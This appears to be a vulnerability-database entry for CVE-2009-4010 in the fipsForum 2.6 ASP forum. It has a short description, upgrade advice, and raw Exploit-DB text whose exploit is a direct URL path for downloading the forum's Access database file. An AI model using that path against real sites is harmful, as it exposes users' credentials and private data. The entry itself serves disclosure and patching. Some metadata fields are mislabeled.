fipsForum v2.6 Remote Database Disclosure Vulnerability

vendor:

fipsForum

by:

ViRuSMaN

8,8

CVSS

HIGH

Remote Database Disclosure

522

CWE

Product Name: fipsForum

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: YES

Related CWE: CVE-2009-4010

CPE: cpe:a:fipsforum:fipsforum:2.6

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

fipsForum v2.6 Remote Database Disclosure Vulnerability

fipsForum v2.6 is vulnerable to remote database disclosure. An attacker can access the database directly by sending a request to the vulnerable URL. This can lead to the disclosure of sensitive information such as usernames, passwords, and other confidential data.

Mitigation:

Upgrade to the latest version of fipsForum.

Source

Exploit-DB raw data:

==============================================================================
        [»] fipsForum v2.6 Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ fipsForum ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://server/[path]/_database/forumFips.mdb